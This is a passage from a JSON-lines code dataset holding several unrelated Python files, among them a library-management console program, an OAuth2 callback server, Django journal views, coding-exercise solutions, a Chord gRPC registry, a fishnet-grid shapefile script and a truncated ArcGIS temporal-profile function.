lib2.writelines(f1)\ndef bookadd(f,f1,f2):\n abc=('bookname:'+str(f)+'\\n'+'author name:'+str(f1)+'\\n'+'publisher name:'+str(f2)+'\\n') \n library.writelines(abc)\n library1.append(f) \ndef bookremove(g):\n lib1=open('library-data.dat','r')\n read14=lib1.readlines()\n lib14=open('library-data.dat','w')\n z4=len(read14)\n for c4 in range(z4):\n f4=read14[c4]\n lib14.writelines(f4)\ndef bookorderremove(h):\n lib1=open('book-order.dat','r')\n read13=lib1.readlines()\n lib12=open('bookorder.dat','w')\n z2=len(read13) \n for c3 in range(z2):\n f2=read13[c3] \n lib12.writelines(f2) \n#main program:- \nprint('--WELCOME TO LIBRARY MANAGEMENT SYSTEM--')\ntime.sleep(1)\nwhile True:\n t5=PrettyTable(['MAIN MENU'])\n t5.add_row(['1. Initiate program'])\n t5.add_row(['2. Exit program'])\n t5.add_row(['3. View credits'])\n t5.add_row(['4. update database online'])\n print(t5)\n time.sleep(1)\n masteroption=int(input('choose(1-4):'))\n if masteroption==1:\n time.sleep(1)\n t4=PrettyTable(['SNo.','options'])\n t4.add_row(['1.','Librarian'])\n t4.add_row(['2.','Member'])\n print(t4)\n time.sleep(1)\n hello=int(input('choose any one(1-2):-'))\n if hello==1:\n while True:\n ID=(input('Enter user ID:-'))\n PASSWORD=int(input('enter Password:-'))\n a12=passwordcheck(ID,PASSWORD)\n time.sleep(1)\n if a12==True:\n print('access granted')\n break\n else:\n time.sleep(1)\n print('user ID or password incorrect.')\n continue\n t1=PrettyTable(['SNo.','Options'])\n t1.add_row(['1.','Add/Remove/Edit a book'])\n t1.add_row(['2.','Issue a book(as a member)'])\n t1.add_row(['3.','Return a book(as a member)'])\n t1.add_row(['4.','Reserve a book(as a member)'])\n t1.add_row(['5.','Add a new member/Cancel membership'])\n t1.add_row(['6.','view member activity'])\n t1.add_row(['7.','change to member'])\n t1.add_row(['8.','update database online'])\n print(t1)\n time.sleep(1)\n while True:\n choice1=int(input('select your option(1-7):'))\n if choice1==1:\n time.sleep(1)\n t2=PrettyTable(['S.No','choice'])\n t2.add_row(['1.','Add a book to the Database'])\n t2.add_row(['2.','Remove a book from Database'])\n t2.add_row(['3.','Edit book info'])\n print(t2)\n while True:\n time.sleep(1)\n choice12=int(input('Choose an option(1-3):'))\n while True:\n if choice12==1:\n time.sleep(1)\n bookname=(input('enter the name of book:'))\n bookauthor=(input('enter the name of author:'))\n bookpublish=(input('enter the name of publishing house:'))\n bookadd(bookname,bookauthor,bookpublish)\n bookindividual(bookname,bookauthor,bookpublish)\n choice13=str(input('modifications complete(Y/N):'))\n if choice13=='y' or choice13=='Y':\n break\n else:\n continue\n elif choice12==2:\n time.sleep(1)\n bookname=(input('enter the name of book:'))\n bookremove(bookname)\n choice14=(input('modifications complete(Y/N):'))\n if choice14=='y' or choice14=='Y':\n break\n else:\n continue\n elif choice12==3:\n time.sleep(1)\n bookname=str(input('enter the name of book:'))\n bookname1=str(input('enter the modification of the book'))\n bookmodif(bookname,bookname1)\n choice15=str(input('modifications complete(Y/N):'))\n if choice15=='y' or choice15=='Y':\n print(library1)\n break\n else:\n continue\n time.sleep(1)\n choice16=str(input('final modification(Y/N):'))\n if choice16=='y' or choice16=='Y':\n break\n else:\n continue\n elif choice1==2:\n time.sleep(1) \n while True:\n bookissue1=str(input('what book would you like to issue?:'))\n if bookissue1 in library1:\n time.sleep(1)\n print('you have issued the book',bookissue1)\n bookissue(bookissue1)\n break\n elif bookissue1 not in library1:\n time.sleep(1)\n print('sorry! book not available')\n break\n else:\n time.sleep(1)\n print('error 505! book not found.')\n continue\n elif choice1==3:\n time.sleep(1)\n bookret=str(input('what book do you want to return:'))\n bookreturn(bookret)\n elif choice1==4:\n time.sleep(1)\n bookreser=str(input('what book would you like to reserve:'))\n bookorder(bookreser)\n elif choice1==5:\n time.sleep(1)\n t6=PrettyTable(['SNo.','choice'])\n t6.add_row(['1.','add a member'])\n t6.add_row(['2.','delete a member'])\n print(t6)\n option5=(input('choose command(1-2):'))\n if option5==1:\n while True:\n user1=(input('enter member name:'))\n DOE=(input('enter date of enrollment:')) \n emailID=(input('enter email-ID:-'))\n memberadd(user1,DOE,emailID)\n memberindividual(user1,DOE,emailID)\n choice152=('would you like to add more members?(Y/N):')\n if choice152=='y' or choice152=='Y':\n continue\n else:\n break\n elif choice15==2:\n user2=(input('enter member name:'))\n memberdel(user2)\n print(user2,' has been deleted.')\n choice153=('would you like to delete more members?(Y/N):')\n if choice153=='y' or choice153=='Y':\n continue\n else:\n break\n choice5=(input('final modification?(Y/N):'))\n if choice5=='y' or choice5=='Y':\n continue\n else:\n break\n elif choice1==6:\n a=members1.readlines()\n print(a)\n break\n elif choice1==7:\n break\n elif choice1==8:\n Weburl=urllib.request.urlopen('http://127.0.0.1:8000/data/')\n URL=Weburl.geturl()\n webbrowser.open_new(URL)\n elif hello==2:\n user=(input('hello there, fellow member. please input your name:'))\n if user in member1:\n membercheck(user)\n time.sleep(1)\n print('Hello,',user,'what would you like to do?:')\n t3=PrettyTable(['S.No','choice'])\n t3.add_row(['1.','Issue a book'])\n t3.add_row(['2.','Return a book'])\n t3.add_row(['3.','Reserve a book'])\n t3.add_row(['4.','Cancel membership'])\n print(t3)\n time.sleep(1)\n choice7=int(input('what would you like to do?(1-4):'))\n while True:\n if choice7==1:\n time.sleep(1)\n bookissue1=str(input('what book would you like to issue?:'))\n if bookissue1 in library1:\n time.sleep(1)\n print('you have issued the book',bookissue1)\n bookissue(bookissue1)\n break\n elif bookissue1 not in library1:\n time.sleep(1)\n print('sorry! book not available')\n break\n else:\n time.sleep(1)\n print('error 505! book not found.')\n continue\n elif choice7==2:\n time.sleep(1)\n bookret=(input('what book do you want to return:'))\n bookremove(bookret)\n print('thank you for returning your book on time.')\n break\n elif choice7==3:\n time.sleep(1)\n bookreser=(input('what book would you like to reserve:'))\n bookorder(bookreser)\n break\n elif choice7==4:\n time.sleep(1)\n prompt=(input('are you sure you want to cancel membership?(Y/N):'))\n if prompt=='Y' or prompt=='y':\n memberdel(user)\n time.sleep(1)\n print('thank you for your time!')\n break\n time.sleep(1)\n elif masteroption==2:\n print('Thank you for your time!')\n break\n elif masteroption==3:\n print('program developed in year 2019 by Darshil &Sankalp(KVR)')\n break\n elif masteroption==4:\n\n Weburl=urllib.request.urlopen('http://127.0.0.1:8000/data/')\n URL=Weburl.geturl()\n webbrowser.open_new(URL)\n\n","repo_name":"Darshil-Solanki/library_management","sub_path":"LIB MANAGEMENT 4.py","file_name":"LIB MANAGEMENT 4.py","file_ext":"py","file_size_in_byte":14246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33242033695","text":"from bottle import route, run, redirect, request\nimport json\nimport requests\nfrom config import *\n\n@route('/oauth2/login')\ndef login():\n querystring = \"response_type=code&client_id=\"+CLIENT_ID+\"&redirect_uri=\"+REDIRECT_URI\n\n redirect(URL_AUTHORIZATION+querystring)\n\n@route('/oauth2/callback')\ndef callback():\n acessCode = request.query.get('code')\n \n getToken(acessCode)\n\ndef getToken(code):\n payload = {\n \"grant_type\":\"authorization_code\",\n \"client_id\":CLIENT_ID,\n \"client_secret\":CLIENT_SECRET,\n \"redirect_uri\":REDIRECT_URI,\n \"code\":code\n }\n\n headers = {\n 'content-type': 'application/json'\n }\n\n response = requests.request(\"POST\", URL_GET_TOKEN, data=json.dumps(payload), headers=headers)\n\n retorno = json.loads(response.text)\n\n token = retorno['access_token']\n\n print(token)\n\nrun(host='localhost', port=8000)\n","repo_name":"DisruptivaLabs/Oauth2","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3544100064","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport networkx as nx\n\nif __name__ == '__main__':\n data = pd.read_csv(\"verkosto.csv\")\n G = nx.from_pandas_edgelist(data, \"lahto\", \"tulo\")\n centrality = nx.degree_centrality(G)\n eigen_centrality = nx.eigenvector_centrality(G)\n closeness = nx.closeness_centrality(G)\n betweenness_centrality = nx.betweenness_centrality(G)\n results = pd.DataFrame({\n \"keskeisyys\": centrality,\n \"ominaisvektorikeskeisyys\": eigen_centrality, \n \"läheisyyskeskeisyys\": closeness, \n \"välillisyyskeskeisyys\": betweenness_centrality,\n })\n results.to_csv(\"keskeisyys.csv\")\n maksimit = {c: results[c].idxmax() for c in results.columns}\n print(maksimit)\n print(f\"keskus: {nx.center(G)}\")\n print(f\"periferia: {nx.periphery(G)}\")\n print(f\"tiheys: {nx.density(G):.2f}\")\n print(f\"tärkein klikki: {nx.max_weight_clique(G, weight=None)} (Huom! Näitä voi olla useita)\")\n nx.draw_networkx(G, with_labels=True)\n plt.show()\n","repo_name":"AnttiHaerkoenen/laadulliset","sub_path":"data/lasku.py","file_name":"lasku.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73709572919","text":"from django.shortcuts import render, get_object_or_404, redirect, reverse\n\nfrom .forms import JournalEntryForm\nfrom .models import Journal\nfrom users.models import CustomUser\n\n\n# display all of the user's journal entries\ndef journal_dashboard(request):\n journal_entries = Journal.objects.filter(author=request.user).order_by('-entry_date')\n context = {\n 'journal_entries': journal_entries,\n }\n return render(request, 'journal/journal_dashboard.html', context)\n\n\n# single journal entry\ndef journal(request, pk):\n journal = get_object_or_404(Journal, slug=pk)\n\n form = JournalEntryForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.instance.user = request.user\n form.instance.journal = journal\n form.save()\n return redirect(reverse('journal-detail', kwargs={\n 'pk': pk\n }))\n context = {\n 'form': form,\n 'journal': journal,\n }\n return render(request, 'journal/journal.html', context)\n\n# create journal entry\ndef journal_create(request):\n title = 'Create'\n instance = Journal(author=request.user)\n form = JournalEntryForm(instance=instance)\n #author = CustomUser.objects.filter(username=request.user.username)\n if request.method == 'POST':\n form = JournalEntryForm(request.POST or None, \n request.FILES or None)\n if form.is_valid():\n form.instance.author = request.user\n form.save()\n return redirect(reverse('journal-detail', kwargs={\n 'pk': form.instance.slug\n }))\n context = {\n 'title': title,\n 'form': form,\n }\n return render(request, 'journal/journal_create_form.html', context)\n\ndef journal_update(request, pk):\n title = 'Update'\n journal = get_object_or_404(Journal, pk=pk)\n form = JournalEntryForm(request.POST or None, request.FILES or None, instance=journal)\n author = request.user\n if request.method == 'POST':\n if form.is_valid():\n form.instance.author = author\n form.save()\n return redirect(reverse('journal-detail', kwargs={\n 'pk': form.instance.slug\n }))\n context = {\n 'title': title,\n 'form': form\n }\n return render(request, 'journal/journal_create_form.html', context)\n\ndef journal_delete(request, pk):\n journal = get_object_or_404(Journal, pk=pk)\n journal.delete()\n return redirect(reverse('journal-list'))\n\n","repo_name":"QodeBroJim/goal-tracking","sub_path":"journal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33319548732","text":"\"\"\"\n给定一个二叉树,其中所有的右节点要么是具有兄弟节点(拥有相同父节点的左节点)的叶节点,要么为空,\n将此二叉树上下翻转并将它变成一棵树, 原来的右节点将转换成左叶节点。返回新的根。\n\n例子:\n\n输入: [1,2,3,4,5]\n\n 1\n / \\\n 2 3\n / \\\n4 5\n\n输出: 返回二叉树的根 [4,5,2,#,#,3,1]\n\n 4\n / \\\n 5 2\n / \\\n 3 1 \n\n\n\n\n解题思路:\n翻转的形式一开始不是很清楚,但是discuss里面的高票答案给了一个很好的解释。看例子,树的左边最深的底层是4,\n4是新的root。对于每个root node,将链接右孩子的指针去掉,将root node变为当前左孩子的left node\n,root node成为左孩子的right node。\n\n 1\n / x\n 2 -- 3\n / x\n4 -- 5\n^\nnew root\n\"\"\"\n\nclass Solution:\n def upsideDownBinaryTree(self, root):\n # 递归\n parent, parent_right = None, None\n while root:\n l = root.left\n root.left = parent_right\n parent_right = root.right\n root.right = parent\n parent = root\n root = l\n return parent","repo_name":"WyAzx/Leetcode-Fighting","sub_path":"code/python/156.upsideDownBinaryTree.py","file_name":"156.upsideDownBinaryTree.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3586451491","text":"# 2023/04/04 Baek 2531\n\n# 시간초과 풀이\n# import sys\n# input = sys.stdin.readline\n\n# N, d, k, c = list(map(int, input().split()))\n\n# numbers = []\n# for _ in range(N):\n# numbers.append(int(input()))\n\n# numbers += numbers[:-1]\n\n# result = k\n# for start in range(N):\n# temp = set([c])\n# for j in range(start, start + k):\n# temp.add(numbers[j])\n\n# result = max(result, len(temp))\n\n# print(result)\n\n# k크기의 구간에서 쿠폰에 있는 값이 있거나 중복되는값이 하나라도 있으면 반복을 고려 x\nimport sys\ninput = sys.stdin.readline\n\nN, d, k, c = list(map(int, input().split()))\n\nnumbers = []\nfor _ in range(N):\n numbers.append(int(input()))\n\nnumbers += numbers[:-1]\n\nresult = 0\n\nfor start in range(N):\n temp = set(numbers[start:start + k] + [c])\n result = max(result, len(temp))\n # 최대 먹을 수 있는 초밥 수 k + 1\n if result == k + 1:\n break\n\nprint(result)\n","repo_name":"kkw2758/Algorithm","sub_path":"투포인터/baek_2531.py","file_name":"baek_2531.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38223986406","text":"import grpc\t\nimport chord_pb2\nimport chord_pb2_grpc\nfrom concurrent import futures\nfrom sys import argv\nimport random\n\n\ndef getFromArgsRegistry(args):\n\treturn args[1].split(':')[0], int(args[1].split(':')[1]), int(args[2])\n\nipaddr = \"\"\nport = 0\nm = 0\nchord_info = {}\n\ndef getNonColision():\n\tres = int(random.uniform(0, 2**m))\n\twhile res in chord_info.keys():\n\t\tres = int(random.uniform(0, 2**m))\n\treturn res\n\ndef findNext(id, main_id):\n\tlist_id = sorted(list(chord_info.keys()))\n\tfor _id in list_id:\n\t\tif _id >= id % 2**m:\n\t\t\treturn _id\n\tif len(list_id) > 0:\n\t\treturn sorted(list_id)[0]\n\treturn main_id\n\n\n\ndef register(ipaddr, port):\n\tif len(chord_info.keys()) < 2**m:\n\t\tid = getNonColision()\n\t\tchord_info[id] = (ipaddr, port)\n\t\treturn (id, m)\n\treturn (-1, \"Chord is full\")\n\n\ndef deregister(id):\n\tif not id in chord_info.keys():\n\t\treturn (False, f\"no {id} in chord\")\n\tdel chord_info[id]\n\treturn (True, f\"successful deregister {id}\")\n\n\ndef populate_finger_table(id):\n\tfinger_ids = {}\n\tfor i in range(m):\n\t\tfinger_ids[findNext((id + 2 ** i) % (2**m), id)] = i\n\n\tif id in finger_ids:\n\t\tdel finger_ids[id]\n\n\tresult_list = []\n\tfor _id in finger_ids.keys():\n\t\tresult_list.append((_id, f\"{chord_info[_id][0]}:{chord_info[_id][1]}\"))\n\tthis_id_pos = -1\n\tlist_id = sorted(list(chord_info.keys()))\n\tfor _id in range(len(list_id)):\n\t\tif list_id[_id] == id:\n\t\t\tthis_id_pos = _id\n\t\t\tbreak\n\tprocess_id = list_id[(this_id_pos - 1 + len(list_id)) % len(list_id)]\n\treturn process_id, result_list\n\n\ndef get_chord_info():\n\tresult = []\n\tfor id in chord_info.keys():\n\t\tresult.append((id, f\"{chord_info[id][0]}:{chord_info[id][1]}\"))\n\treturn result\n\nclass ServiceHandler(chord_pb2_grpc.RegistryServicer):\n\tdef Register(self, request, context):\n\t\tdata = register(request.ipaddr, request.port)\n\t\tresponse = chord_pb2.ResponseRegister()\n\t\tresponse.done = data[0]\n\t\tresponse.message = str(data[1])\n\t\treturn response\n\n\tdef Deregister(self, request, context):\n\t\tdata = deregister(request.id)\n\t\tresponse = chord_pb2.ResponseDeregister()\n\t\tresponse.done = data[0]\n\t\tresponse.message = data[1]\n\t\treturn response\n\n\tdef PopulateFingerTable(self, request, context):\n\t\tdata = populate_finger_table(request.id)\n\t\tresponse = chord_pb2.ResponsePopulateFingerTable()\n\t\tresponse.id = data[0]\n\t\tfor sub_data in data[1]:\n\t\t\taddress = chord_pb2.Address()\n\t\t\taddress.id = sub_data[0]\n\t\t\taddress.addr = sub_data[1]\n\t\t\tresponse.result.append(address)\n\t\treturn response\n\t\n\tdef GetChordInfo(self, request, context):\n\t\tdata = get_chord_info()\n\t\tresponse = chord_pb2.ResponseGetChord()\n\t\tfor sub_data in data:\n\t\t\taddress = chord_pb2.Address()\n\t\t\taddress.id = sub_data[0]\n\t\t\taddress.addr = sub_data[1]\n\t\t\tresponse.result.append(address)\n\t\treturn response\n\n\tdef Name(self, request, context):\n\t\tresponse = chord_pb2.Answer()\n\t\tresponse.name = \"Connected to Registry\"\n\t\treturn response\n\n\t\ndef main():\n\tglobal ipaddr, port, m\n\tipaddr, port, m = getFromArgsRegistry(argv)\n\tserver = grpc.server(futures.ThreadPoolExecutor(max_workers=8))\n\tchord_pb2_grpc.add_RegistryServicer_to_server(ServiceHandler(), server)\n\tserver.add_insecure_port(f'{ipaddr}:{port}')\n\tserver.start()\n\ttry:\n\t\tserver.wait_for_termination()\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\nShutting down\")\n\nif __name__ == '__main__':\n\trandom.seed(0)\n\tmain()\n\n\n\t","repo_name":"rkBekzat/Distributed-and-Network-Programming","sub_path":"week5/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2408196609","text":"\n\"\"\"\nPseudo Algo for Creating Attributed Grids\n\n* build a geodataframe based script (or pyshp/fiona)\n\nfor group in gdf[FIELD_NAME].unique():\n\tgroup_gdf = gdf[gdf[FIELD_NAME] == group].copy()\n\tgroup_bounds = group_gdf.bounds\n\tgroup_intersect_gdf = geodataframe_select_by_location(points_gdf, group_gdf)\n\n1) Prepare subset point data\n2) For each point subset,\n\ta) determine the bounding box extent\n\tb) use the bounding box extents to generate a local fishnet grid\n\n\"\"\"\n\nimport sys\n# 64bit anaconda architecture:\nsys.path.append(r\"C:\\Anaconda2_64bit\")\nsys.path.append(r\"C:\\Anaconda2_64bit\\Scripts\")\nsys.path.append(r\"C:\\Anaconda2_64bit\\Library\\bin\")\nsys.path.append(r\"C:\\Anaconda2_64bit\\Lib\\site-packages\")\n#---#\nimport os\nimport geopandas\nfrom geopandas.tools import sjoin\nimport pysal\nfrom pyproj import Proj, transform\nfrom pysal.weights.Distance import DistanceBand\nfrom pysal.esda.getisord import G\nimport shapely\nfrom shapely.geometry import shape, base\nfrom shapely.geometry import Polygon, Point, box, asPolygon, asPoint, MultiPoint\nfrom shapely import wkt\nimport fiona\nimport ogr, osr\nfrom osgeo import ogr, osr\nimport pandas as pd\nimport itertools\nimport numpy as np\nimport scipy\nimport math\nfrom math import log\nimport shapefile\nimport re\n\n#------------------------------------------------------------------------------------------------\n#############\n## Methods ##\n#############\n\n#---------------------------------------------\n\ndef xfrange(start, stop, step):\n # algorithm pulled from here:\n # https://github.com/DigitalGlobe/gbdxtools/blob/master/gbdxtools/catalog_search_aoi.py\n # range() but for float steps\n while start < stop:\n yield start\n start += step\n else:\n yield stop\n\n#---------------------------------------------\n\ndef geoms_to_shp(in_geoms, out_shp, projection):\n # algorithm pulled from here:\n # https://github.com/DigitalGlobe/gbdxtools/blob/master/gbdxtools/catalog_search_aoi.py\n\n prj_name = '{}.prj'.format(out_shp.split('.')[0])\n with open(prj_name, 'w') as prj:\n prj.write(projection)\n shp_writer = shapefile.Writer(shapefile.POLYGON)\n out_fields = [\n ['id', 'N']\n ]\n out_fields_names = [x[0] for x in out_fields]\n for name in out_fields:\n shp_writer.field(*name)\n #------------------------------\n for in_id, geom in enumerate(in_geoms, start=1):\n shp_writer.record(*[str(in_id)])\n shp_writer.poly(parts=[list(box(*geom).exterior.coords)])\n shp_writer.save(out_shp)\n\n#---------------------------------------------\ndef create_fishnet(bbox, grid_size, output_name):\n \"\"\"\n\n :param bbox: [w, s, e, n] list object\n :param grid_size: an integer in meters\n :param output_name: a string with a .shp file type ending (a full directory path)\n :return: void. Invokes geoms_to_shp() to output a shapefile to the output_name directory\n \"\"\"\n # Create Fishnet (David's Method):\n\n # Latitude: 1 deg = 110.574 km\n # Longitude: 1 deg = 111.320*cos(latitude) km\n\n # We need 5 km:\n\n # shp = shapefile.Reader(file)\n # the following metadata is from the .prj file\n us_albers_equal_area = 'PROJCS[\"USA_Contiguous_Albers_Equal_Area_Conic\",GEOGCS[\"GCS_North_American_1983\",DATUM[\"D_North_American_1983\",SPHEROID\\\n [\"GRS_1980\",6378137.0,298.257222101]],PRIMEM[\"Greenwich\",0.0],UNIT[\"Degree\",0.0174532925199433]],PROJECTION[\"Albers\"],PARAMETER[\"False_Easting\",0.0],\\\n PARAMETER[\"False_Northing\",0.0],PARAMETER[\"Central_Meridian\",-96.0],PARAMETER[\"Standard_Parallel_1\",29.5],PARAMETER[\"Standard_Parallel_2\",45.5],\\\n PARAMETER[\"Latitude_Of_Origin\",37.5],UNIT[\"Meter\",1.0]]'\n\n wgs84 = 'GEOGCS[\"GCS_WGS_1984\",DATUM[\"D_WGS_1984\",SPHEROID[\"WGS_1984\",6378137.0,298.257223563]],PRIMEM[\"Greenwich\",0.0],UNIT[\"Degree\",0.0174532925199433]]'\n\n # grid size in degrees or meters - depending on input projection\n # grid_size = 50000 # this is 5 km\n\n # w, s, e, n = shp.bbox\n w, s, e, n = bbox\n Ys = [i for i in xfrange(s, n, grid_size)]\n Xs = [i for i in xfrange(w, e, grid_size)]\n\n bb_li = []\n row = 0\n col = 0\n for y, y1 in zip(Ys, Ys[1:]):\n row += 1\n for x, x1 in zip(Xs, Xs[1:]):\n col += 1\n bbox = (x, y, x1, y1)\n bb_li.append(bbox)\n\n geoms_to_shp(bb_li, output_name, us_albers_equal_area)\n\n#---------------------------------------------\n##########################\n## Directory Management ##\n##########################\n\ncd = r\"C:\\Users\\joogl\\OneDrive\\Documents\\GIS DataBase\\Retailer_Grid\"\nprefix = \"Tickers_Points_Sub_\"\n\n# loop through directory and identify all shapefiles with \"prefix\"\n# Note: will deprecate this method later and instead create a new attribute ID that delineates region\nsub_files = []\nfor file in os.listdir(cd):\n if file.startswith(prefix):\n if file.endswith(\".shp\"):\n sub_files.append(file)\n\n# ---------------------------------------------\n###################\n## Grid Creation ##\n###################\n\n# For each of these shapefiles, open the shapefile, determine the bounding box extent, and generate a unique\n# fishnet grid\nfor file in sub_files:\n sub_dir = os.path.join(cd, file)\n # instantiate a geopandas df object based on the points subset shapefile\n sub_gdf = geopandas.GeoDataFrame.from_file(sub_dir)\n # instantiate a shapefile object based on the points subset shapefile\n sub_shp = shapefile.Reader(sub_dir)\n # determine the bounding box extent using shapefile\n \"\"\"\n Can easily do this with:\n pyshp, or ogr, or fiona, or geopandas, or by pulling bytes 36 through 60 from the\n header of the actual shapefile (fun fact. the bbox of a shapefile is stored in\n the header of the actual file)\n\n In geopandas:\n geopandas (in_gdf.total_bounds) or bounds of each feature (in_gdf.bounds)\n \"\"\"\n shp_bounds = sub_shp.bbox\n # create an output file name\n # For Slashes Only: m = re.search(r\"\\[([A-Za-z0-9_]+)\\]\", file)\n m = re.search(r\"^[^.]*\", file)\n file_name = m.group(0)\n grid_out = os.path.join(cd, file_name+\"_grid.shp\")\n # # # Create the fishnet # # #\n create_fishnet(shp_bounds, 5000, grid_out)\n\n","repo_name":"jooglyp/code-examples","sub_path":"fishnet-create.py","file_name":"fishnet-create.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33446621638","text":"from ._util import _to_datetime, _datetime2ole, _ole2datetime, _iso_to_datetime, _check_if_iso_format, _time_filter, _linear_regression, _harmonic_regression\nimport datetime as _datetime\nimport logging as _logging\n_LOGGER = _logging.getLogger(__name__)\n\n\ntry:\n import numpy as _np\n import matplotlib.pyplot as _plt\n from matplotlib.pyplot import cm as _cm\n\nexcept:\n raise\n \n \n\ndef temporal_profile(raster, points=[], time_field=None, variables=[], bands=[0], time_extent=None, dimension=None, dimension_values=[], \n show_values=False, trend_type=None, trend_order=None, plot_properties={}):\n\n '''\n A temporal profile serves as a basic analysis tool for imagery data in a time series. \n Visualizing change over time with the temporal profile allows trends to be displayed \n and compared with variables, bands, or values from other dimensions simultaneously.\n\n Using the functionality in temporal profile charts, you can perform trend analysis, gain insight into \n multidimensional raster data at given locations, and plot values that are changing over time \n in the form of a line graph.\n\n Temporal profile charts can be used in various scientific applications involving time series \n analysis of raster data, and the graphical output of results can be used directly as \n input for strategy management and decision making.\n\n The x-axis of the temporal profile displays the time in continuous time intervals. The time field is \n obtained from the timeInfo of the image service.\n \n The y-axis of the temporal profile displays the variable value.\n\n\n ==================================== ====================================================================\n **Argument** **Description**\n ------------------------------------ --------------------------------------------------------------------\n raster Required Imagery Layer object.\n ------------------------------------ --------------------------------------------------------------------\n points Required list of point Geometry objects. \n ------------------------------------ --------------------------------------------------------------------\n time_field Required string. The time field that will be used for plotting \n temporal profile.\n \n If not specified the time field is obtained from the timeInfo of \n the image service.\n ------------------------------------ --------------------------------------------------------------------\n variables Required list of variable names. \n For non multidimensional data, the variable would be name of the Sensor.\n To plot the graph against all sensors specify - \"ALL_SENSORS\" \n ------------------------------------ --------------------------------------------------------------------\n bands Optional list of band indices. By default takes the \n first band (band index - 0). \n For a multiband data, you can compare the time change of different \n bands over different locations.\n ------------------------------------ --------------------------------------------------------------------\n time_extent Optional list of date time object. This represents the time extent\n ------------------------------------ --------------------------------------------------------------------\n dimension Optional list of dimension names. This option works specifically on \n multidimensional data containing a time dimension and other dimensions.\n\n The temporal profile is created based on the specific values in other \n dimensions, such as depth at the corresponding time value. For example, \n soil moisture data usually includes both a time dimension and vertical \n dimension below the earth's surface, resulting in a temporal profile \n at 0.1, 0.2, and 0.3 meters below the ground.\n ------------------------------------ --------------------------------------------------------------------\n dimension_values Optional list of dimension values. This parameter can be used to specify\n the values of dimension parameter other than the time dimension (dimension\n name specified using dimension parameter)\n ------------------------------------ --------------------------------------------------------------------\n show_values Optional bool. Default False.\n Set this parameter to True to display the values at each point in the line graph.\n ------------------------------------ --------------------------------------------------------------------\n trend_type Optional string. Default None.\n Set the trend_type parameter eith with linear or harmonic to draw the trend line\n linear : Fits the pixel values for a variable along a linear trend line.\n harmonic : Fits the pixel values for a variable along a harmonic trend line.\n ------------------------------------ --------------------------------------------------------------------\n trend_order optional number. The frequency number to use in the trend fitting. \n This parameter specifies the frequency of cycles in a year. \n The default value is 1, or one harmonic cycle per year.\n\n This parameter is only included in the trend analysis for a harmonic regression.\n ------------------------------------ --------------------------------------------------------------------\n plot_properties Optional dict. This parameter can be used to set the figure \n properties. These are the matplotlib.pyplot.figure() parameters and values\n specified in dict format.\n\n eg: {\"figsize\":(15,15)}\n ==================================== ====================================================================\n\n :return:\n None\n\n '''\n \n t1 = []\n\n if not isinstance(variables,list):\n variables= [variables]\n if not isinstance(points,list):\n points= [points]\n if not isinstance(bands,list):\n bands= [bands]\n\n if time_field is None:\n try:\n x_var = raster.properties.timeInfo['startTimeField']\n except:\n raise RuntimeError(\"Specify time_field to plot the temporal profile.\")\n else:\n x_var = time_field\n\n if \"hasMultidimensions\" in raster.properties and \\\n raster.properties['hasMultidimensions'] == True:\n \n mosaic_rule = {\n \"mosaicMethod\" : \"esriMosaicAttribute\",\n \"ascending\" : False,\n \"sortField\": x_var,\n \"multidimensionalDefinition\": [{\n \"variableName\" : \"\",\n \"dimensionName\" : x_var\n }]\n }\n if time_extent is not None:\n if isinstance(time_extent, _datetime.datetime):\n time_extent =[int(time_extent.timestamp() * 1000)]\n elif isinstance(time_extent, list):\n if isinstance(time_extent[0], _datetime.datetime) and isinstance(time_extent[1], _datetime.datetime):\n time_extent = [int(time_extent[0].timestamp() * 1000),\n int(time_extent[1].timestamp() * 1000)]\n for index, each_elem in enumerate(mosaic_rule['multidimensionalDefinition']):\n if mosaic_rule['multidimensionalDefinition'][index]['dimensionName'] == x_var:\n mosaic_rule['multidimensionalDefinition'][index]['values']=[time_extent]\n\n if dimension is not None and dimension_values is not None:\n if not isinstance(dimension_values,list):\n dimension_values = [dimension_values]\n mosaic_rule['multidimensionalDefinition'].append({\n \"variableName\" : \"\",\n \"dimensionName\" : dimension,\n \"values\":dimension_values,\n \"isSlice\":True})\n\n num_lines = len(dimension_values)*len(variables)*len(points)*len(bands)\n y=[[] for i in range(0, num_lines)]\n x=[[] for i in range(0, num_lines)]\n #x_var = raster.properties.timeInfo['startTimeField']\n\n if len(variables)==1:\n variable_unit = None\n for ele in raster.multidimensional_info['multidimensionalInfo']['variables']:\n if(ele['name']==variables[0]):\n if \"unit\" in ele.keys():\n variable_unit = ele['unit']\n break\n res=[]\n t1=[]\n d1=[]\n xx=[]\n yy=[]\n for band in bands:\n for index, point in enumerate(points):\n for variable in variables:\n for md_def in mosaic_rule['multidimensionalDefinition']:\n md_def[\"variableName\"]=variable\n\n res=raster.get_samples(geometry=point, return_first_value_only=False, out_fields=\"*\", mosaic_rule=mosaic_rule)\n\n if dimension_values !=[]:\n for dim_value in dimension_values:\n for res_ele in res:\n if(res_ele['attributes'][dimension]==dim_value):\n yy.append(res_ele['values'][band])\n xx.append(_to_datetime(res_ele['attributes'][x_var]))\n d1.append({\"yy\":yy, \"xx\":xx, \"dimension_value\":dim_value})\n yy=[]\n xx=[]\n \n\n else:\n for ele in 